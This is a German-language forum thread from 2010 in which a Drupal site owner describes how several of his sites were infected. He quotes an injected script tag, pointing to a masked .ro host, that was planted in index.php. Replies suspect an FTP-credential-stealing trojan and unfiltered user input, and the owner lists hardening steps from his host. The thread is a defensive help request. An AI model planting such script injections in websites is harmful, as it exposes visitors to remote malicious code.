Sicherheitslücke in Drupal?
Eingetragen von empoint (127)am 20.07.2010 - 11:52 Uhr in
Hallo zusammen,
ich habe mehrere Drupal Seiten am laufen - ein paar davon wurden infiziert mit einem Virus bzw. Trojaner undzwar wurde was am Code verändert - z.B. in der index.php bzw. in den Java Script Dateien.
Ein kleines Beispiel aus der index.php
<script src=http://xxxxxxxxxxxxx.ro/xyz.php></script>
Habe mich dann umgehend mit meinem Webspace Provider in Verbindung gesetzt und ihn gefragt, wie denn sowas passieren könnte.
Er hat mir dann 2 Hinweise gegeben wie man evtl. so etwa verhindern könnte
1. Eintrag in htacces - RewriteRule .* /---------http-------/ [F,NC]
2. Eintrag in php.ini - allow_url_fopen = off
Habe natürlich die Einträge wie empfohlen vorgenommen - nun meinte er noch zu mir dass ich die FTP Zugänge nochmal ändern sollte und die PHP Scripte auf Sicherheitslücken überprüfen soll.
Vielleicht hat ja auch jemand mal das selbe Problem wie ich gehabt und kann mir einen Rat geben? Vielleicht welche Sicherheitseinstellungen definitiv gemacht werden sollten (Drupal sowie Server)
Vielen Dank schonmal
Micha
- Anmelden oder Registrieren um Kommentare zu schreiben
Wie dein Webspace-Provider
am 20.07.2010 - 13:37 Uhr
Wie dein Webspace-Provider dir schon gesagt hat, unbedingt die Passwörter der FTP-Zugänge ändern, aber vorher auf alle Fälle nochmal deine lokale Festplatte untersuchen. Hab da mal über nen Trojaner gelesen, der die FTP-Zugänge, die in FTP-Clients (wie z.Bsp. Filezille) gespeichert sind, ausliest und so dann die schädlichen JS-Dateien hochladen kann.
Ansonsten glaub ich nicht, dass du bei Drupal offensichtliche Sicherheitslücken findest. Wenn du in Drupal Sicherheitslücken hast, dann haste sie vermutlich unabsichtlich selbst eingebaut. Wie schon gesagt, ich vermute eher einen Trojaner auf deiner Festplatte.
sowas habe ich auch vermutet
am 20.07.2010 - 13:39 Uhr
sowas habe ich auch vermutet - dank dir schonmal ... jetzt heißt es ja nur noch abwarten und schauen ob es wirklich an den FTP Zugängen gelegen hat.
Gruß
Micha
Was vielleicht noch ne
am 20.07.2010 - 13:52 Uhr
Was vielleicht noch ne Möglichkeit wäre:
Besteht auf den betroffenen Seiten die Möglichkeit, das Benutzer deiner Seite an irgendeiner Stelle ungefilterten HTML- oder PHP-Code eingeben können?
Das einzige was die User
am 20.07.2010 - 14:25 Uhr
Das einzige was die User machen können ist eine Mail über das webform schreiben - alles andere können die User nicht tun.